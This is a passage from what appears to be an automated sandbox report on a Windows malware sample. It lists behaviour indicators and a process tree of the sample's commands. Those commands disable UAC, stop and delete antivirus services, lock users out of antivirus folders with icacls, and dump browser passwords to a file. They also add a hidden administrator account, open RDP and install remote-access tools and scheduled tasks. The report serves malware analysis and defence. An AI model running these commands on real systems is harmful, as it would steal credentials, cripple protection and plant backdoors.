| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\WindowsTask\AppHost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\WindowsTask\AppHost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Programdata\Windows\winit.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\svchost.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\P.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\rootsystem\P.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\R8.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\winlogon.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\Vega.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\MOS.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\Vegas.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\ProgramData\Microsoft\Intel\Logs.exe
C:\ProgramData\Microsoft\Intel\Logs.exe -pnaxui
C:\ProgramData\Microsoft\Intel\winit.exe
C:\ProgramData\Microsoft\Intel\winit.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\L.bat" "
C:\ProgramData\Microsoft\Intel\Cheat.exe
C:\ProgramData\Microsoft\Intel\Cheat.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"
C:\Programdata\Windows\winit.exe
"C:\Programdata\Windows\winit.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop swprv
C:\programdata\microsoft\intel\svchost.exe
"C:\programdata\microsoft\intel\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config swprv start= disabled
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\sc.exe
sc stop swprv
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\sc.exe
sc config swprv start= disabled
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\programdata\microsoft\rootsystem\P.exe
"C:\programdata\microsoft\rootsystem\P.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop crmsvc
C:\programdata\microsoft\rootsystem\1.exe
C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\sc.exe
sc stop crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Programdata\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Programdata\Windows\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Programdata\Windows\rutserv.exe
rutserv.exe /start
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\programdata\microsoft\intel\winlogon.exe
"C:\programdata\microsoft\intel\winlogon.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7CB2.tmp\7CB3.bat C:\programdata\microsoft\intel\winlogon.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\Programdata\Windows\rutserv.exe
C:\Programdata\Windows\rutserv.exe
C:\ProgramData\Microsoft\Intel\Vega.exe
C:\ProgramData\Microsoft\Intel\Vega.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe -p123
C:\programdata\microsoft\intel\MOS.exe
C:\programdata\microsoft\intel\MOS.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\olly.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\Iostream.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\SystemIdle.exe /deny %username%:(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny %username%:(F)
C:\programdata\microsoft\intel\Vegas.exe
"C:\programdata\microsoft\intel\Vegas.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny %username%:(F)
C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\olly.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\Iostream.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\SystemIdle.exe /deny Admin:(F)
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A1BE.tmp\A1BF.bat C:\programdata\microsoft\intel\Vegas.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny Admin:(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny Admin:(F)
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\R.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\systemreset.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\OS.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\systemreset.exe /setowner Admin
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
\??\c:\Programdata\Microsoft\Intel\Cheat64.exe
"c:\Programdata\Microsoft\Intel\Cheat64.exe" /qn
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\windows\system32\systemreset.exe" /grant:r Admin:F
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\ProgramData\RealtekHD\taskhostw.exe
C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\programdata\GOOGLE /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\hhsm /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\windows\hhsm /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
